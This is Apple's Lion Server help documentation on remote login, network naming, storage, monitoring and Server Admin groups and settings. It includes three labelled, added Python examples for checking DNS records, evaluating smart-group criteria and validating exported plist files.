You can log in to your server by using the ssh command-line tool on another computer. You can't use Telnet to log in to your server. Open the Terminal app or another SSH client app and enter an ssh command as follows:
ssh -l username [IP address]
For example, if your user name is ravi and your computer's IP address is 192.168.1.100, enter:
ssh -l ravi 192.168.1.100
For more information, see the man page for ssh.


Allow screen sharing and remote management


You can use the Server app to let other computers view your screen and control your server. The other computer's user sees what's on your screen and can open, move, and close files and windows, open apps, and even restart the server. If you allow screen sharing and remote management, your server can be observed and controlled by screen sharing software using the VNC protocol on another computer or Apple Remote Desktop on another Mac. VNC screen sharing is included with Mac OS X Lion and Mac OS X Snow Leopard. It's also available for Windows computers and for iPhone, iPad, and iPod touch. Apple Remote Desktop is available from the Mac App Store.

1. Select the server in the Server app sidebar, and click Settings.
2. Select Enable screen sharing and remote management.
Selecting this option in the Server app only allows screen sharing and Apple Remote Desktop access by the administrator account created when the server was initially set up. If you want to specify who can share your screen and what capabilities Apple Remote Desktop users have, use the Sharing pane of System Preferences.


Allow remote administration

If you use the Server app to allow remote administration, your server can be administered by the Server app on another Mac.

1. Select the server in the Server app sidebar and click Settings.
2. Select Allow remote administration using Server.

RELATED TOPICS

Manage Lion Server remotely
Prepare an administrator computer


Improve performance as a dedicated server


You can regulate system resources for better performance as a dedicated server. The server can be more responsive to users whose computers and mobile devices get services from it, while being less responsive when you use apps on it.

1. Select the server in the Server app sidebar, and click Settings.
2. Select Dedicate system resources to server services.
This change takes effect when the server restarts.

Manage network settings

Find or change your server's name


You can see and change your server's computer name and local hostname by using the Server app. The computer name, which you can change, identifies the server to users who are browsing for shared computers in the Finder. The local hostname, also known as the local network name, is a name users can use to get all services from your server on your intranet. By default, the local hostname is the computer name followed by .local. You can change the first part of the local hostname, but it always ends with .local. The local hostname can't include spaces; they're replaced with hyphens (-). Capitalization doesn't matter in a local hostname. For example, if the computer name is Server, the local hostname is initially Server.local or server.local. If the computer name is Design Team Server, the default local hostname is Design-Team-Server.local or design-team-server.local.

Bonjour is an Apple networking technology that makes it easy to set up and use devices and services on a network. Because Bonjour-compatible devices and services advertise their availability, it's easy for users (or an application or service) to find devices and services that they want to use. For example, if you turn on file sharing service, Mac OS X Lion users on your intranet see your server in the Shared section of the Finder sidebar.

1. To find your server's computer name, select the server in the Server app sidebar and click Network.
2. To find the local hostname and optionally change the computer name or the local hostname, click Edit next to the computer name. You can see and change the computer name and the local hostname in the dialog that appears. The computer name can be 63 Roman characters or fewer. It can include spaces, but avoid using =, :, or @.

RELATED TOPIC

Find or change your server's host name


Find or change your server's host name


You can see and change your server's host name by using the Server app. If you change the host name, you may also need to update the DNS server for your network, and users' computers may need to be reconfigured.

The host name is the full, unique name that identifies the server on your intranet and (optionally) on the Internet, for example, server.mycompany.com or server.mycompany.private. The DNS server for your intranet must be configured to map the host name to the server's intranet IP address. If another server on your intranet provides DNS service, ask the DNS server administrator for help. If you want Internet users to access your server by using its host name, an Internet DNS hosting service must configure its DNS servers to map the host name to your server's Internet IP address.

1. To find your server's host name, select the server in the Server app sidebar and click Network.
2. To change the host name, click Edit next to the host name, and proceed through the Change Host Name assistant. For information about settings in a Change Host Name assistant pane, click the Help button in the pane.
After changing your server's host name, the DNS server for your network must be updated so that the new host name points to your server's IP address. Also, a reverse lookup of the IP address must point to the new host name. If your DNS service is provided by a DNS hosting service, your ISP, or another server on your network, ask the provider to update your server's DNS records. If your server provides its own DNS service, you can use Server Admin to update it. For information about Server Admin, see Lion Server tools.
Users who have installed profiles from your server can update their Macs to use the server's new host name by getting new profiles and installing them. Lion Server automatically creates a new profile each time a user downloads one, and uses the server's current host name in the new profiles.
Changing your server's host name may disrupt the connections of users' computers that have Mac OS X Lion. If this happens, users need to remove your server from their list of network account servers and then add it again. For information, search Mac Help for Join your Mac to a network account server.

RELATED TOPIC

Find or change your server's name


Find or change your server's IP address


The Server app displays your server's IP address, and you can change it in the Network pane of System Preferences. If you change the IP address, you may also need to update the DNS server for your network, and users' computers may need to be reconfigured. If your server has multiple network interfaces, you can find and change each one's IP address.

To find your server's IP address, select the server in the Server app sidebar and click Network. The numeric IP address appears below the Interfaces heading, to the right of the network interface name. If your server has multiple interfaces, each is listed.

To change the IP address, open System Preferences, click Network, select the network service listed on the left, and enter an IP address on the right. You can't change the IP address if the Configure IPv4 setting is Using DHCP. In this case, the DHCP server for your network assigns an IP address to your server. The DHCP server should be configured to assign your server the same IP address all the time. This feature is called static mapping or DHCP reservations. If you have an Internet router, it's probably your DHCP server, and you should see its documentation for instructions. If the IP address can't be edited, you can enable editing by changing the Configure IPv4 setting to Manually or Using DHCP with manual address.

After changing your server's IP address, the DNS server for your network must be updated so that your server's host name points to the new IP address. Also, a reverse lookup of the new IP address must point to your server's host name. If your DNS service is provided by your ISP or another server on your network, ask your ISP or the DNS server administrator to update your server's DNS records. If your server provides its own DNS service, you can use Server Admin to update it. For information about Server Admin, see Lion Server tools.

Changing your server's IP address may disrupt the connections of users' computers that have Mac OS X Lion. If this happens, users need to remove your server from their list of network account servers and then add it back. For more information, search Mac Help for Join your Mac to a network account server.
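The host name and IP address topics above both end with the same requirement: the host name must resolve to the server's address, and a reverse lookup of that address must return the host name. The check below is an added example (not Apple's code) that verifies both directions; it runs offline against a constructed zone, and the live_lookups() helper wraps the socket module when you want to test the resolver your computers actually use.

```python
"""Forward/reverse DNS agreement check for a server's host name and IP address.

Added example for the host-name and IP-address topics; it is not Apple's code.
Lookups are passed in as functions so the check can run offline against the
constructed zone below; live_lookups() wraps the socket module for a real check.
"""
import ipaddress
import socket


def fqdn(name):
    """Normalise a DNS name: lower-case, with exactly one trailing dot."""
    return name.strip().lower().rstrip(".") + "."


# Constructed zone data (not a real network): the server was renamed from
# old.mycompany.private to server.mycompany.private and the new A record was
# added, but the PTR record for 192.168.1.100 still names the old host.
FORWARD = {
    "server.mycompany.private.": ["192.168.1.100"],
    "old.mycompany.private.": ["192.168.1.100"],
    "mail.mycompany.private.": ["192.168.1.101", "192.168.1.102"],
}
REVERSE = {
    "192.168.1.100": "old.mycompany.private.",
    "192.168.1.101": "mail.mycompany.private.",
}


def zone_lookups(forward, reverse):
    """Build (forward_lookup, reverse_lookup) callables over static tables."""
    return (lambda name: list(forward.get(fqdn(name), [])),
            lambda ip: reverse.get(ip))


def live_lookups():
    """Callables that query the resolver this computer is actually using."""
    def forward(name):
        try:
            infos = socket.getaddrinfo(name.rstrip("."), None, socket.AF_INET)
        except socket.gaierror:
            return []
        return sorted({info[4][0] for info in infos})

    def reverse(ip):
        try:
            return socket.gethostbyaddr(ip)[0]
        except socket.herror:
            return None
    return forward, reverse


def check_host_record(host_name, expected_ip, forward_lookup, reverse_lookup):
    """Return a list of problems; an empty list means both directions agree.

    Verifies the two conditions stated in the help: the host name resolves to
    the server's IP address, and the reverse lookup of that address returns
    the host name (compared case-insensitively, trailing dot ignored).
    """
    problems = []
    name = fqdn(host_name)
    try:
        ip = str(ipaddress.ip_address(expected_ip))   # rejects malformed input
    except ValueError:
        return [f"{expected_ip!r} is not a valid IP address"]
    addresses = forward_lookup(name)
    if not addresses:
        problems.append(f"no forward record for {name}")
    elif ip not in addresses:
        problems.append(f"{name} resolves to {', '.join(addresses)}, not {ip}")
    ptr = reverse_lookup(ip)
    if ptr is None:
        problems.append(f"no reverse record for {ip}")
    elif fqdn(ptr) != name:
        problems.append(f"reverse lookup of {ip} returns {fqdn(ptr)}, expected {name}")
    return problems


if __name__ == "__main__":
    lookups = zone_lookups(FORWARD, REVERSE)
    for host, ip in [("server.mycompany.private", "192.168.1.100"),
                     ("mail.mycompany.private", "192.168.1.102")]:
        issues = check_host_record(host, ip, *lookups)
        print(host, ip, "OK" if not issues else "; ".join(issues))
```

Run with the constructed zone it reports the stale PTR for the renamed server and the missing PTR for the second mail address, which are exactly the records the help tells you to have your DNS provider update.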


Manage server storage


You can see information about your server's disks and their contents by using the Server app. The Storage pane displays a list of available disks and the amount of space available on each disk. You can browse the folders and files on a disk, create new folders, and change access permissions.

1. In the Server app sidebar, select the server, and then click Storage.
2. Choose how you want to browse disk contents by clicking a View button in the lower left corner of the Storage pane.
To view disks, folders, and files in a list, click the List View button. List view shows the amount of available space as a number and a graph. You can show or hide disk and folder contents by clicking disclosure triangles in list view.
To view disks, folders, and files in columns, click the Column View button. You can resize or expand columns as follows:
To resize columns, drag the bottom of a column divider (where two vertical lines appear).
To resize all columns at once, hold down the Option key as you drag.
To expand a column to reveal its longest item, double-click the column divider.
To expand all columns to reveal their longest items, Option-double-click any column divider.
To expand all columns equally to reveal the longest item, hold down Shift-Option while double-clicking any column divider.
To resize columns, Control-click a column divider and choose from the shortcut menu.
3. To create a new folder, select the disk or folder you want to contain it, and then choose New Folder from the Action pop-up menu.
4. To change an item's access permissions, select the item and choose Edit Permissions from the Action pop-up menu. For detailed instructions, see Set folder access permissions.
5. To propagate a folder's access permissions to the items it contains, select the folder and choose Propagate Permissions from the Action pop-up menu.
Important: Propagation begins as soon as you click OK, and you can't undo propagation. Before clicking OK, make sure you select the folder and permission settings you intend.

Monitor servers

Check server status


The Server app shows the overall status of each service.

In the Server sidebar, look for a green status indicator next to each service icon. A service with a status indicator is turned on and operating normally. A service without an indicator is turned off.

RELATED TOPIC

Start or stop a service


View server information


You can see general information about your server by using the Server app. The server's Overview pane displays the Mac model name, processor, serial number, storage capacity, memory size, startup disk, system version, and amount of time since the last system restart.

1. In the Server app sidebar, select the server by name, and then click Overview.
2. To see more information about the startup disk and any other disks connected to the server, click the arrow next to the startup disk name. You'll see the Storage pane, which highlights the startup disk in the list of available disks.

RELATED TOPIC

Manage server storage


Monitor server stats


Use the Stats pane of the Server app to get a picture of server activity over time. You can find out when the server is likely to be busy, whether it's operating near capacity, and when it's likely to be least used.

Choose a type of activity and a time period from the pop-up menus.
Processor Usage: Monitor the workload of the server's processor or processors.
Memory Usage: See how much memory the server has been using.
Network Traffic: Track how much incoming and outgoing data the server transfers over the network.
You can also monitor server activity by using the Server Status widget on the server or on another computer. For information, see Use the Server Status widget.
If the server has a display, you can use Activity Monitor (in the Utilities folder in Launchpad) on the server. Activity Monitor shows the processes and applications currently open on the computer. You can use Activity Monitor to monitor short-term processor workload, disk activity, and network activity. For information, see Activity Monitor Help.


Track server alerts


You can use the Server app to view messages about important events that have occurred on the server. Each alert message notes when the event occurred, briefly describes the event, outlines available recovery options for resulting problems, and may assist you in recovery. Lion Server sends alerts about low disk space, software updates, expiring SSL certificates, email viruses, and network configuration changes.

View alerts and resolve resulting problems
1. To view a list of alerts, select Alerts in the Server sidebar. Alerts you haven't viewed are displayed in bold.
2. To view the description and recovery options for an alert, select the alert in the list, and then choose View Alert from the Action pop-up menu. You can also view an alert by double-clicking it in the list.
3. To recover from a problem associated with the alert, use the controls or follow the instructions under the Recovery Options heading.

Clear all alerts
Select Alerts in the Server sidebar, and then choose Clear All from the Action pop-up menu.


Change the email address for server alerts


You can use the Server app to change the email addresses Lion Server sends alerts to. Lion Server sends alerts about low disk space, software updates, expiring SSL certificates, email suspected of having a virus, and network configuration changes.

1. Select Alerts in the Server sidebar.
2. Choose Configure Email Addresses from the Action pop-up menu.
3. Enter the email address you want alerts sent to, or enter multiple email addresses separated by commas.


Use the Server Status widget


You can use the Server Status widget to monitor the status of Lion Server, either on the server itself or from another computer with Mac OS X Lion.

1. Open Dashboard, and look for the Server Status widget. You can open Dashboard by clicking its icon in Launchpad or pressing its keyboard shortcut, which is usually the F12 key. If you don't see the Server Status widget in Dashboard, click Dashboard's Open button (+), and then click or drag the Server Status widget from the widget bar. You can use multiple Server Status widgets to see more than one aspect of a server's status at once or to monitor other servers on the network. For more information, search Mac Help for Dashboard and widgets.
2. If you see the Server, User Name, and Password fields, enter the server's DNS name or IP address followed by an administrator name and password, and then click Done.
3. When the Server Status widget is connected to a server, it displays a graph and other status information about the server and its services. You can:
Monitor processor usage, network load, or disk usage by clicking an icon below the graph.
Change the processor or network graph's time period to one hour, day, or week by clicking the graph.
If your server has more than one disk, view the status of each disk in turn by clicking the disk usage graph.
Check the status indicator and activity statistics for the listed services. A green indicator means the service is running.
Connect to a different server by moving the mouse to the upper-left corner of the widget and clicking the Info button (i).

RELATED TOPICS

Check server status
Monitor server stats


Close the Server app connections


For security, you can close the Server app window when you aren't actively using it to manage users, groups, services, or system information. Leaving a server connection open on an unattended server makes it easier for an unauthorized person to make changes to users, groups, or services.

You can close the Server app connections by doing any of the following:
Close the Server app window.
Choose Manage > Close.
Quit the Server app.


Reduce the use of administrator accounts


For security, create a user account that isn't an administrator account, and use that account when you don't need administrator privileges. Limit the number of people with administrator privileges. If you have enabled the root user and no longer need it, disable it.

1. Create a standard user account in the Users & Groups pane of System Preferences on the server.
2. In the server's login window, use a standard user account instead of an administrator account.
3. Use your administrator account with any application that requires administrator privileges. For example, use your administrator name and password with the Server app when you need to manage users, groups, or services.
The new user account also appears in the Users pane of the Server app, and it can be used to access services provided by your server from a user's computer on the network.


If users cant access a service via the Internet


If users can access a service on the local network but not via the Internet, try these solutions.
If you have an Internet router, you may need to configure port forwarding (also known as port mapping) on it. For more information, see Router port mapping.
If your server is managing an AirPort device, select it in the Server sidebar and make sure the desired service is listed under Public Services. For more information, see Manage AirPort port mapping and Wi-Fi login.
Make sure your server's Internet host name is registered on the Internet, and check the DNS server configuration on the user's computer. For more information, see Register the server's Internet host name, and search Mac Help for Test your DNS server.

Server Admin

Server Admin UI Reference

Server Admin main window description


The Server Admin interface is shown here, with each element explained in the table.

Server list | This shows servers, groups, smart groups, and, if needed, administered services for each server. You select a group to view a status summary for grouped computers. You select a computer for its overview and server settings. You select a server's service to control and configure the service.
Toolbar | This shows available context buttons for configuration panes. If a button is grayed out or can't be clicked, you don't have administrative permissions to access it.
Main work area | This shows status and configuration options. It looks different for each service and for each context button selected.
All servers | This shows computers added to Server Admin, regardless of status.
Available servers | This lists the local-network scanner, which you can use to discover servers to add to your server list.
Server | This shows the hostname of the managed server. Select it to show a summary that includes hardware, operating system, active service, and system status.
Service | This shows an administered service for a server. Select it to get service status, logs, and configuration options. Green indicates a running service.
Group | This shows an administrator-created group of servers. Select it to view a status summary for grouped computers. For more information, see Add a server group.
Smart group | This shows an automatic group, populated with servers that meet predetermined criteria. For more information, see Add a smart group.
Add button | This shows a pop-up menu of items to add to the Server list: servers, groups, and smart groups.
Action button | This shows a pop-up menu of actions possible for a selected service or server, including disconnecting the server, sharing the server's screen, and so forth.
Refresh button | This allows you to send a status request to computers in the Server list.
Service start/stop button | When a service is selected, this button allows you to start or stop the service, as relevant.


Server Admin consolidated server view


The Server Admin interface is shown here, with each element explained in the table.

Server list | This shows servers, groups, smart groups, and, if needed, the administered services for each server. You select a group to view a status summary for grouped computers. You select a computer for its overview and server settings. You select a server's service to control and configure the service.
Status list | This shows available information that includes: host name, OS version, CPU load, network throughput, approximate disk usage, uptime, and number of connected file sharing users.
All servers | This shows computers added to Server Admin, regardless of status.
Available servers | This lists the local-network scanner, which you can use to discover servers to add to your server list.
Server | This shows the hostname of the managed server. Select it to show a summary that includes hardware, operating system, active service, and system status.
Service | This shows an administered service for a server. Select it to get service status, logs, and configuration options. Green indicates a running service.
Group | This shows an administrator-created group of servers. Select it to view a status summary for grouped computers. For more information, see Add a server group.
Smart group | This shows an automatic group, populated with servers that meet predetermined criteria. For more information, see Add a smart group.
Add button | This shows a pop-up menu of items to add to the Server list: servers, groups, and smart groups.
Action button | This shows a pop-up menu of actions possible for a selected service or server, including disconnecting the server, sharing the server's screen, and so forth.
Refresh button | This allows you to send a status request to computers in the Server list.


Server Admin preference pane


This pane provides a list of Server Admin application preferences, which are explained in the following table.

Preference | Default | Description
Require valid digital signature (SSL) | | This ensures that the server uses a valid SSL certificate for encryption.
Try to resolve IP addresses to DNS names; Use computer name in list | On (listed once for this pair) | This performs a DNS lookup for IP addresses. This uses the Mac OS computer name instead of the host name.
Expand new server in list on login | On | This shows all services enabled for administration in the server list.
Show icons in file browser | | In the Sharing pane, this shows the icon and the file name.
Show system accounts in users and groups browser | | This shows users and groups that are hidden because they belong to operating system processes.
Don't warn if a service port is blocked by firewall | On | This skips a check on the IP firewall when saving service port number preferences.
Alert user on server errors | On | This provides additional information for basic server errors.
Auto-refresh status every ___ seconds | 60 | This sets the poll frequency for status updates.
List a maximum of ___ users or groups | 100 | This limits the number of users or groups shown in the user and group drawer.


Server settings reference


The Settings pane of Server Admin has configuration options for a server. The settings include additional services, network settings, time services, and administration options. After selecting the server, you select the Settings pane for the following options:

Section | Contains
General | Additional services for remote contact and monitoring. Services include NTP, SNMP, SSH, and Remote Desktop management.
Network | Server names and a network interface list.
Date and Time | Settings for time zones and automatic time.
Alerts | Options for what conditions trigger an email to an administrator.
Services | A list of services that can be shown in Server Admin for administration.

RELATED INFORMATION

Control access to services
Import and export Server Admin preferences
Import and export service settings
Add or remove services in the server view


Get more server instructions


You can find configuration and reference information for services found in Server Admin by visiting the Lion Server resource page.

Using Server Admin

Add servers and server groups


Add servers to Server Admin to control and configure them, and group them to find and organize them.

Add a server
Add servers to Server Admin to control and configure them. The servers you can administer using Server Admin appear in the Servers list on the left side of the application window. Add the server to the Servers list and log in to it in one of two ways:

Click Add (+) in the bottom action bar and choose Add Server.
Choose Server > Add Server from the menu bar.

Add a server group
Server Admin displays computers in groups in the Server List section of the application's window. The default server group is called All Servers. This is a list of administered computers that you have added and authenticated to. You can create other groups to organize the computers on your network. You can make more specific, targeted groups of servers from your All Servers list. First, create blank lists and then add servers from the All Servers list. You can do the following with server groups:
Create as many groups as you want
Add servers to more than one list
Group lists according to geographic region, functionality, hardware configuration, and even color
You can click a group name to see a status overview of servers in the group.
1. Under the Server list at the bottom of the Server Admin window, click Add (+).
2. Select Add Group and name the group. To rename groups, click the group and let the mouse hover over the name for a few seconds. When the name becomes editable, rename the group.
3. Drag the servers from the All Servers group to the new group.

RELATED INFORMATION

Smart group criteria


Add a smart group


You can create a server list that populates based on custom criteria. This is referred to as a smart group. Server Admin displays computers in groups in the Server List section of the application's window. The default server list is called the All Servers list. This is a list of administered computers that you have added and authenticated to. You can match the following criteria:
Visible services
Running services
Network throughput
CPU utilization
IP address
OS version

1. Under the Server list at the bottom of the Server Admin window, click Add (+). 2. Select Add Smart Group. 3. Name the smart group. 4. Define the criteria for servers to appear in the list and click OK. The group appears in the Server list.

RELATED INFORMATION

Smart group criteria


Remove servers, server groups, and smart groups


You can remove a server, server group, or smart group from the Servers list. If a server in the Servers list appears gray, double-click the server or click the Connect button in the toolbar to log in again. To enable auto-reconnect the next time you open Server Admin, select "Remember this password in my keychain" while you log in.

1. Select the item to remove.
2. If it's a server, disconnect from the server: click the Perform Action button in the bottom action bar and choose Disconnect, or choose Server > Disconnect from the menu bar.
3. Remove the item you've selected: if it's a server, click the Perform Action button in the bottom action bar and choose Remove Server, or choose Server > Remove Server from the menu bar. If it's a server group or smart group, click the Perform Action button in the bottom action bar and choose Remove Group, or press Delete on the keyboard.

RELATED INFORMATION

Smart group criteria


Edit a server group


After you make a server group, you can add, remove, or reorder servers in the group.

To rename groups, use the normal Mac file renaming method:
1. Click the group and let the mouse hover over the name for a few seconds.
2. When the name becomes editable, rename the group.

To add servers to the group, drag the servers from the All Servers group to the new group.
To remove servers from the group, select the servers and press Delete.
To rearrange servers in a group, drag a server to a new place in the list.

RELATED INFORMATION

Smart group criteria


Edit a smart group


After making a smart group, you can change its name and filter criteria. You can match the following criteria:

- Visible services
- Running services
- Network throughput
- CPU utilization
- IP address
- OS version

1. Double-click the smart group to edit it.
2. Rename the smart group, if needed.
3. Edit the criteria that determine which servers appear in the list and click OK. The group appears in the Server list.

RELATED INFORMATION

Smart group criteria


Smart group criteria


After you create a smart group, a server added to the All Servers list (or other specified list) that matches the criteria is added to the smart group. You can match the following criteria:

- Visible services
- Running services
- Network throughput
- CPU utilization
- IP address
- OS version
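As an added example (not Apple's code), the following Python evaluates criteria of the six kinds listed above against a constructed server inventory, recomputing membership from the current list each time, the way a smart group picks up a newly added server. The record fields, operator names and sample servers are hypothetical, since Server Admin's own criterion format is not documented here.

```python
"""Evaluate Server Admin-style smart group criteria against a server list.

Added example, not Apple's code. The ServerRecord fields, the operator
names and the sample inventory are hypothetical stand-ins for the six
criteria Server Admin offers (visible services, running services, network
throughput, CPU utilization, IP address, OS version).
"""
import ipaddress
import operator
from dataclasses import dataclass
from typing import Callable, Iterable, List, Tuple

# Comparison operators accepted for numeric and version criteria.
NUMERIC_OPS = {
    ">": operator.gt, ">=": operator.ge,
    "<": operator.lt, "<=": operator.le, "==": operator.eq,
}


@dataclass(frozen=True)
class ServerRecord:
    """Snapshot of one administered server (hypothetical field names)."""
    name: str
    ip: str
    os_version: str
    visible_services: frozenset = frozenset()
    running_services: frozenset = frozenset()
    throughput_mbps: float = 0.0
    cpu_percent: float = 0.0


def version_tuple(version: str) -> Tuple[int, ...]:
    """'10.7.2' -> (10, 7, 2) so versions compare numerically, not as text."""
    return tuple(int(part) for part in version.split("."))


def build_predicate(field_name: str, op: str, value) -> Callable[[ServerRecord], bool]:
    """Turn one (field, operator, value) criterion into a test on a record."""
    if field_name in ("visible_services", "running_services"):
        if op != "contains":
            raise ValueError(f"{field_name} supports only 'contains'")
        return lambda s: value in getattr(s, field_name)
    if field_name == "ip":
        if op != "in":
            raise ValueError("ip supports only 'in <network>'")
        network = ipaddress.ip_network(value, strict=False)
        return lambda s: ipaddress.ip_address(s.ip) in network
    if field_name == "os_version":
        target = version_tuple(value)
        compare = NUMERIC_OPS[op]
        return lambda s: compare(version_tuple(s.os_version), target)
    if field_name in ("throughput_mbps", "cpu_percent"):
        compare = NUMERIC_OPS[op]
        threshold = float(value)
        return lambda s: compare(getattr(s, field_name), threshold)
    raise ValueError(f"unknown criterion field {field_name!r}")


def smart_group(servers: Iterable[ServerRecord],
                criteria: List[Tuple[str, str, object]],
                match_all: bool = True) -> List[str]:
    """Return the sorted names of servers matching the criteria.

    Membership is recomputed from the current server list on every call,
    so a server added later that matches the criteria shows up without
    editing the group, as with a Server Admin smart group.
    """
    predicates = [build_predicate(*criterion) for criterion in criteria]
    combine = all if match_all else any
    return sorted(s.name for s in servers
                  if combine(pred(s) for pred in predicates))


# Constructed inventory for the example; not real hosts.
INVENTORY = [
    ServerRecord("xserve1", "192.168.1.10", "10.7.2",
                 frozenset({"DNS", "Open Directory", "Mail"}),
                 frozenset({"DNS", "Open Directory"}), 120.5, 35.0),
    ServerRecord("xserve2", "192.168.1.11", "10.6.8",
                 frozenset({"Mail", "Firewall"}), frozenset({"Mail"}), 40.0, 92.0),
    ServerRecord("minisrv", "10.0.5.7", "10.7.0",
                 frozenset({"DNS"}), frozenset(), 5.0, 12.0),
]

# Three smart groups an administrator might define (all criteria must match
# unless match_all=False is passed).
LION_DNS_SERVERS = [("running_services", "contains", "DNS"),
                    ("os_version", ">=", "10.7")]
NEEDS_ATTENTION = [("cpu_percent", ">", 80), ("ip", "in", "10.0.0.0/8")]
LAN_MAIL_CAPABLE = [("visible_services", "contains", "Mail"),
                    ("ip", "in", "192.168.1.0/24")]


if __name__ == "__main__":
    print("Lion DNS servers:", smart_group(INVENTORY, LION_DNS_SERVERS))
    print("Needs attention:", smart_group(INVENTORY, NEEDS_ATTENTION, match_all=False))
    print("LAN mail-capable:", smart_group(INVENTORY, LAN_MAIL_CAPABLE))
```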
RELATED INFORMATION

Add servers and server groups
Add a smart group
Remove servers, server groups, and smart groups
Edit a server group
Edit a smart group


Add or remove services in the server view


Before you can set up services using Server Admin, you must add the service to the server view. By default, no services are shown for your server. As you select services to administer, configuration panes become accessible in a list underneath your computer name. When you select services from the list, those services appear underneath the server hostname in the server list. Services available for administration are:

- DHCP
- DNS
- Firewall
- Mail
- NAT
- NetBoot
- Open Directory
- Podcast Producer
- Push Notify (when administering Snow Leopard Server remotely)
- RADIUS
- Software Update
- Xgrid

1. In Server Admin, select a server.
2. Click the Settings button in the toolbar and then click the Services tab.
3. To add a service, select the checkbox for the service.
4. To remove a service, deselect the checkbox for the service.

RELATED INFORMATION

Server settings reference
Server Admin available services

Lion server fundamentals

Server Admin

Service settings

Control access to services


You can use Server Admin to configure which users and groups can use services hosted by a server. You set up access to services for users and groups using service access control lists (SACLs). You can set up the same access to all services, or you can select a service and customize its access settings. Access controls are simple: choose between allowing all users and groups to use services or allowing only selected users and groups to use them. You can specify access controls separately for individual services, or you can define one set of controls that applies to all services hosted by the server.

You can also control user access to several services using the Server app. For example, only the Server app can control user access to Podcast and Time Machine services. For information, see Control a user's access to services.

1. Select a server in the Servers list.
2. Click Settings, then click Access.
3. Click Services.
4. Choose a service and then choose whether to allow everyone access to it or to allow only specified users to access it.
5. If you chose to specify users, add the users and groups as needed.

RELATED INFORMATION

Server settings reference


Import and export Server Admin preferences


To copy service settings from one server to another, or to save service settings in a plist file for reuse later, use the Export Server Admin Preferences command in Server Admin. Use Import Server Admin Preferences to apply them.

Import Server Admin preferences

To apply Server Admin preferences that were exported from another server or saved earlier in a plist file, use the Import Server Admin Preferences command in Server Admin.
1. Select the target server to receive the settings.
2. From the menu bar, choose Server > Import > Server Admin Preferences.
3. Find and select the saved service file. The only file you can use with this function is a properly formatted XML-based plist file, generated from the settings export.
4. Click Open.

Export Server Admin preferences

To copy service settings from one server to another or to save service settings in a plist file for reuse later, use the Export Server Admin Preferences command in Server Admin.
1. Select the server.
2. From the menu bar, choose Server > Export > Server Admin Preferences.
3. Select the services whose settings you want to copy.
4. Click Save. The file that is created contains service configuration information as a plist XML document.

RELATED INFORMATION

Server settings reference


Import and export service settings


The Settings pane of Server Admin has configuration options for a server. The settings include additional services, network settings, time services, and administration options. You can move the settings between administrator computers.

Import service settings

To apply service settings that were exported from another server or saved earlier in a plist file, use the Import Service Settings command in Server Admin.
1. Select the target server to receive the settings.
2. From the menu bar, choose Server > Import > Service Settings.
3. Find and select the saved service file. The only file you can use with this function is a properly formatted XML-based plist file, generated from the settings export.
4. Click Open.

Export service settings

To copy service settings from one server to another or to save service settings in a plist file for reuse later, use the Export Service Settings command in Server Admin.
1. Select the server.
2. From the menu bar, choose Server > Export > Service Settings.
3. Select the services whose settings you want to copy.
4. Click Save. The file that is created contains service configuration information as a plist XML document.
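Both import commands (Server Admin Preferences above, and Service Settings here) accept only a properly formatted XML-based plist produced by the matching export. As an added example (not Apple's code), this Python enforces that format check and lists the settings an import would change, so an administrator can review a file before applying it to a target server; the service keys in the constructed sample exports are hypothetical, as real exports carry service-specific keys not documented here.

```python
"""Check an exported Server Admin plist before importing it.

Added example, not Apple's code. The Server Admin import commands accept
only an XML-based plist generated by the matching export; this module
enforces that and lists the settings that differ between two exports.
The service keys in the constructed sample exports are hypothetical.
"""
import plistlib
from typing import Any, Dict, List, Optional, Tuple
from xml.parsers.expat import ExpatError

Change = Tuple[str, Optional[Any], Optional[Any]]  # (key path, old, new)


def load_xml_plist(data: bytes) -> Dict[str, Any]:
    """Parse data as an XML plist, rejecting binary plists and other files."""
    # plistlib would happily read a binary plist too; the Server Admin import
    # takes only the XML form, so check the declaration before parsing.
    if not data.lstrip().startswith(b"<?xml"):
        raise ValueError("not an XML property list")
    try:
        obj = plistlib.loads(data, fmt=plistlib.FMT_XML)
    except (plistlib.InvalidFileException, ExpatError, ValueError) as exc:
        raise ValueError(f"malformed plist: {exc}") from exc
    if not isinstance(obj, dict):
        raise ValueError("top-level plist object must be a dictionary")
    return obj


def is_acceptable_export(data: bytes) -> bool:
    """True when data is something the import command would accept."""
    try:
        load_xml_plist(data)
    except ValueError:
        return False
    return True


def diff_settings(current: Dict[str, Any], incoming: Dict[str, Any],
                  prefix: str = "") -> List[Change]:
    """Return every leaf setting present on only one side or with a new value."""
    changes: List[Change] = []
    for key in sorted(set(current) | set(incoming)):
        path = f"{prefix}{key}"
        if key not in current:
            changes.append((path, None, incoming[key]))
        elif key not in incoming:
            changes.append((path, current[key], None))
        elif isinstance(current[key], dict) and isinstance(incoming[key], dict):
            changes.extend(diff_settings(current[key], incoming[key], path + "."))
        elif current[key] != incoming[key]:
            changes.append((path, current[key], incoming[key]))
    return changes


def review_import(current_export: bytes, incoming_export: bytes) -> List[Change]:
    """Validate both exports and report how the incoming one differs."""
    return diff_settings(load_xml_plist(current_export),
                         load_xml_plist(incoming_export))


# Constructed sample exports; the service keys are illustrative, not Apple's.
CURRENT_EXPORT = plistlib.dumps({
    "DNS": {"recursion": True, "forwarders": ["10.0.0.53"]},
    "Firewall": {"enabled": False},
}, fmt=plistlib.FMT_XML)

INCOMING_EXPORT = plistlib.dumps({
    "DNS": {"recursion": False, "forwarders": ["10.0.0.53"]},
    "Firewall": {"enabled": True, "logAllDenied": True},
}, fmt=plistlib.FMT_XML)

# Same content as CURRENT_EXPORT but in binary form, which the import rejects.
BINARY_EXPORT = plistlib.dumps({"DNS": {"recursion": True}}, fmt=plistlib.FMT_BINARY)


if __name__ == "__main__":
    for path, old, new in review_import(CURRENT_EXPORT, INCOMING_EXPORT):
        print(f"{path}: {old!r} -> {new!r}")
```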

RELATED INFORMATION

Server settings reference

Lion server fundamentals

Using the Command Line

About the command-line environment of Lion Server


A command-line interface (CLI) is an alternative to graphical applications for interacting with and controlling your computer. Lion Server provides graphical applications, primarily Server app and Server Admin, to address common administration tasks. However, there are situations where using the CLI might be appropriate. These situations include:

- Configuring advanced options that aren't supported by graphical applications
- Configuring remotely from a computer that doesn't have Server app or Server Admin installed, for example a computer with Windows, Linux, or another UNIX-based operating system
- Performing tasks that are repetitive or that must be run at predefined times
- Editing text files, usually to change advanced configuration settings and preferences

